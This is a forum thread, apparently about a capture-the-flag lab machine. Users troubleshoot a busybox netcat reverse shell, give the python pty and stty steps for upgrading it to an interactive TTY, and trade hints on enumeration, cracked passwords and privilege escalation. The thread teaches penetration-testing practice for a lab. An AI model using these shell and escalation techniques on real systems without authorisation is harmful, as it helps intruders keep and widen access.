Hey there, I’m having the same issue here. When I try to get a revshell using the busybox with nc I get a hit on my terminal saying “connect …” but the shell doesn’t spawn…
I port forwarded using ssh,
then I curled the website and learned that /assets/ as the folder being accessed forr static files “.css” “.js”
You can also justt curl the website locally:
User rosa> curl localhost:8080/assets/
lfi
Just type something in the terminal like “LS”
OMFG, I’m dumb.
Can you explain me why the path doesn’t appear?
Beacause it didn’t appear I thought the shell didn’t spawn.
That’s how you learn, you work till your brain is fried get up and repeat, trial and error my friend.
Sometimes the shell won’t spawn after connecting. You’ll come across this a lot. Maybe someone more experienced can explain why. If you see the message that says you’re connected, then run id, whoami, ls or similar commands to see if you’re connected to the target. When you get an output, you can use script or python to spawn a shell. Let me know if you need a couple of one-liners.
1 Like
Because you had a poor shell, poor shells don’t really supportt anything else than command and output.
upgrade it using python pty, search online python upgrade shell, and use python3 since it’s the version the box is using
One thing that got me, and you may already be doing this so forgive me if this is doesn’t help, but I missed initially when the shell was spawning because all I saw was a message saying I’d received a connection back to my listener, which was exactly what I’d been getting for all the payloads that didn’t work. It was only when I actually typed whoami or ls or something and got the output from the command that I realized the reverse shell had actually worked. So be sure to try sending a command when you get that back-connect to test if the revshell actually worked.
In my browser when accessing the page I just used View Page Source and visually grep’d for any links. That’s where I saw assets existed. You don’t have to fuzz to get some initial ideas of directories and things if you see them in the page source. Of course, fuzzing will be more complete, but checking the source will let you find things right away as well as find things that may not be in your fuzzing wordlists.
This is a great thing to do to upgrade your shell. I use this all the time. Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog specifically “Method 3: Upgrading from netcat with magic”
Basically it boils down to this:
Spawn a shell, like with one of these:
python -c 'import pty; pty.spawn("/bin/bash")'orpython3 -c 'import pty; pty.spawn("/bin/bash")'if you need to specify Python3
Then do this:
- Background the shell by pressing
Ctrl-Z - Run
echo $TERM; stty -a - Make a note of
rowsandcolumnsvalues from output as you’ll need these in a moment. - With the shell still in the background, type
stty raw -echo. Note that after this you won’t see what you type in the shell because it is in raw mode. - Then foreground the shell with
fgand typereset. Now, after the reset, you’ll be able to see again what you type. If it asks you for the TERM type just typexterm. - Now run:
export SHELL=bashexport TERM=xterm- this is likely not needed if you specified the TERM type already.stty rows [value] columns [value]- this makes sure lines wrap correctly in your terminal window!
3 Likes
im trying the busy box nc payload but there’s no indication that it’s listening like i see when i run nc. I tried the whoami command and there was no response to the command in the terminal.
Well, to be clear, the payload doesn’t listen, it calls out to your listener on your attack box. More specifically it initiates a TCP connection - if you’re using TCP for the connection - to your listener. But that’s probably what you meant.
Feel free to PM me the commands you’re using, both the revshell command you’re spawning in the exploit and the command you’re using to start your listener. I’d be happy to take a look and sanity check things for you if you like.
1 Like
guys how can i escalate my privileges to root pls help im stuck at this step
There’s already some tips on the forum here. Assuming you have user access already, make sure you enumerate other things that may be running on the host and then check for vulnerabilities in those things.
I found a privilege escalation vulnerability that involves the umount command ,and i uploaded the exploit code but it seems like nothing happened when i run it
Targeting the umount binary is not the path I used. There’s something else actively running on the host. Think about the first step you ran to enumerate the target. The very first thing you most likely did, the first command you ran to send any packets to the target. Then think about how that enumerated for you things running on the target. Well, sometimes there are things like that you can’t see when you’re poking at a target remotely…but you can see those other things once you have a shell on the target. Those things can be enumerated just like you did at the beginning, as long as you use the right command options, or can be enumerated using other commands. They even show up as part of the standard linpeas output - though there’s a bunch of other stuff in linpeas output that can send you down rabbit holes too - but it just shows it’s a thing to always check when you get a foothold on a target. 
Send me a private message if you’re still stuck and I can try to coach you through the thought process so you can figure it out.
I’m so confused, i found the db and the other user on the machine but it doesn’t work with ssh even with the cracked password, the db has my information in it as well? anyone pls give me a hint
The DB has your info in as well because you created an account using the web interface, right? One of the passwords you got from there should let you get a more normal shell on the target.
this is still pretty vague, any other hints would be much appreciated
Yeah, still trying to be general here in the public forum. Direct messages, that only you see, are a different matter - I’m happy to be a bit more direct there to help get you on the right track.